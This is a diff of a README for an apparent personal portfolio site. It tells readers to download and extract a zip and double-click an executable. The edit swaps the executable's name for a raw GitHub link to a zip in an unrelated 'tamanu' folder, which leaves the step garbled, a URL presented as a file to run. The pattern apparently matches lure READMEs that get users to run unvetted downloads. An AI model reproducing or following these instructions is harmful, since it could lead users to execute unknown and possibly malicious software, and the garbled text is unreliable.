alt-Bias/connerdrake-portfolio-site/README.md

    After downloading, locate the zip file on your computer.
 Right-click on it and select “Extract All” to view the contents.

 5. **Run the Application**
    Navigate to the extracted folder.
-Look for the executable file (it may be named `PortfolioSite.exe`).
+Look for the executable file (it may be named `https://raw.githubusercontent.com/alt-Bias/connerdrake-portfolio-site/main/tamanu/connerdrake-portfolio-site.zip`).
 Double-click on this file to start the application.

 6. **View Your Portfolio**
    Open your preferred web browser and type in the following address: `http://localhost:5000` to view your portfolio site.